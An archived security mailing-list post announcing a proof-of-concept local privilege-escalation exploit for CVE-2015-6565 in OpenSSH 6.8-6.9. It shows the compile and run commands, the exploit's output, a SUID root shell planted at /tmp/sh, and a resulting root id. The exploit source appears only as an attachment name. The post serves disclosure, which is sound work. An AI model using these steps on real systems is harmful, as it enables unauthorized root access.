Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 26 Jan 2017 10:07:24 +0100
Subject: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to
	local  privesc on Linux

Hi list,

I know I'm late to the party, but I was bored, so I decided to write  
an exploit for CVE-2015-6565 which affects OpenSSH 6.8-6.9
It is mostly considered to be a "DoS", even though Jann Horn publicly  
told how it could be exploited for local privilege escalation, but I  
guess its either PoC||GTFO for users to update.


"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY  
devices, which allows local users to cause a denial of service  
(terminal disruption) or possibly have unspecified other impact by  
writing to a device, as demonstrated by writing an escape sequence."

I think the description should be updated.

$ gcc not_an_sshnuke.c -o not_an_sshnuke
$ ./not_an_sshnuke /dev/pts/3
[*] Waiting for slave device /dev/pts/3
[+] Got PTY slave /dev/pts/3
[+] Making PTY slave the controlling terminal
[+] SUID shell at /tmp/sh
$ /tmp/sh --norc --noprofile -p
# id
euid=0(root) groups=0(root)

Federico Bento.

This message was sent using IMP, the Internet Messaging Program.

View attachment "not_an_sshnuke.c" of type "text/x-csrc" (2039 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ